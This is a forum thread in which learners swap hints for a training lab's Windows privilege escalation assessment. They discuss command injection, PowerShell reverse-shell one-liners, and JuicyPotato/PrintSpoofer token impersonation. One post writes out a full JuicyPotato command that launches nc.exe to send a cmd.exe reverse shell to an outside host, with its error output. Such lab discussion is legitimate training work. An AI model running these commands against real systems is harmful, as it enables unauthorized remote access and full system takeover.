[ACADEMY] Windows Privilege Escalation Skills Assessment - Part I

You could get a reverse shell easily.
Check whether you are able to execute multiple commands in the browser (Hint: &&).
There are many ways to obtain a reverse shell, but this was the easy one for me: use PowerShell one-liners. (There is a tricky part in it; if you know, you know, or else just DM me and I will let you know.)

Go to https://revshells.com/ and try different powershell payloads.


For anyone looking for the ldapadmin at the end something saved me A LOT of searching and heartache… a nice big plate of Italian food, always helps.


Can someone help me with the reverse shell? I know how you can enter commands behind the IP, but I can't get a reverse shell to my attacker host. Please send me a DM.

I like this. You mean spaghetti and meatballs of course(?)

solved!

Can someone help me with escalation? I tried JuicyPotato and it works, but I still have the IIS user. How do I get a shell or the user?

Solved!

Hi folks. I have a reverse shell as the IIS user. I know the user has the impersonate privilege, so we can use PrintSpoofer or JuicyPotato to exploit it. I managed to get both onto the target, but neither of them works. I tried cmd spawns and reverse shells using both tools, but they just do not work. Can anyone please let me know what they used exactly? Do I need to somehow compile these tools specifically for the target? Both of these tools are described as working on Windows Server 2016.

The JuicyPotato exploit command works as provided in the material, with one twist: an error pops up, for which you can find guidance here. Mind any additional tools needed along the way, e.g. nc.exe. The PrintSpoofer exploit did not work for me, but it might be incompatible with the specific Windows version. Anyway, I didn't find a solid reason why, so it might just be me.

Hi,
I believe I am stuck on the same problem you had. Here is the command I ran; I tried different CLSIDs for it too, but nothing seems to work. I tried CLSIDs for Windows Server 2016:

PS C:\Users\Public>

Did anyone figure out how to find the password for the ldapadmin before escalating privileges to system? I would guess there is a way because of the order of the questions.

Could anyone give me a hint for the rev-shell?
I have found the injection vuln and I am able to run cmd/PS commands through it. I have tried the PowerShell one-liners from revshell.com and also tried uploading nc.exe to use it to send a shell, but nothing seems to work.

@Sudo1 ? :slight_smile:

EDIT: Solved. Downloaded a new VPN…

Jumping on this thread after trying Juicy Potato multiple times…

I'm having trouble catching the elevated shell after JuicyPotato reports a successful elevation. I've tried multiple ways, like having cmd.exe pass another PowerShell reverse shell argument, and I've also tried placing both nc.exe and nc64.exe on the box. I've even written a .bat file to shorten the syntax in the one-liner. No issues with CLSIDs; I've found multiple that work thanks to the CLSID.ps1 I ran on the target.

When I try to outright use nc.exe or nc64.exe to check the shell as the current user, I get no output or error of any kind. Do I need to compile nc.exe from source on the target? That seems like a lot just to elevate privilege for this exercise, but I’m willing to try. Have not tried printspoofer yet, maybe that will be easier.

Thanks

Ok, after a reset and taking some time to think about it, I figured out it was ultimately a syntax error in the JuicyPotato arguments. Seems the -a flag needs a ‘/c’ before the actual full nc.exe path to get a successful shell back. I was using .\example.exe instead of the full paths to cmd and netcat. Also the ‘/c’ threw me.

At least I had the fundamentals right!

:relieved:

Yes, in general you can use JuicyPotato with Windows Server 2019 / Windows 10 build 1809 and with newer builds you can use PrintSpoofer or RoguePotato. Works pretty well

Hi, Please help me exploit the command injection bug to access the reverse shell

Hi, I am still stuck on the privilege escalation with the JuicyPotato task. I tried all the CLSIDs I got from CLSID.ps1 and the others in the same post, but none of them helped me get rid of the 10038 error. Can someone please help me fix this issue?

PS C:\tmp> c:\tmp\JuicyPotato1.exe -l 1337 -c "F87B28F1-DA9A-4F35-8EC0-800EFCF26B83" -p c:\windows\system32\cmd.exe -a "/c c:\tmp\nc.exe -e cmd.exe 10.10.15.35 8443" -t *

Testing 98068995-54d2-4136-9bc9-6dbcb0a4683f 1337
COM -> recv failed with error: 10038
Testing 0289a7c5-91bf-4547-81ae-fec91a89dec5 1337
COM -> recv failed with error: 10038
Testing 9acf41ed-d457-4cc1-941b-ab02c26e4686 1337
COM -> recv failed with error: 10038
Testing 6d8ff8e0-730d-11d4-bf42-00b0d0118b56 1337
COM -> recv failed with error: 10038
Testing 924DC564-16A6-42EB-929A-9A61FA7DA06F 1337
COM -> recv failed with error: 10038
Testing f65817c8-dd85-4136-89f0-b9d12939f2c4 1337
COM -> recv failed with error: 10038
Testing BA441419-0B3F-4FB6-A903-D16CC14CCA44 1337

Yeah I had that quite a bit in my attempts. Googling around brought me back to this forum post here and explained that error. For me, I had to continue until I found a CLSID that worked, but you may want to try resetting the target VM to start a fresh attack. I think network issues on the target host can cause that error, or potentially too many successive attempts might also cause the socket to close as well.

For the ones looking for answers to the second question: don't WASTE your time locating the ldapadmin credentials. Do the PrivEsc first. TBH I don't understand why this question was put in second place to begin with.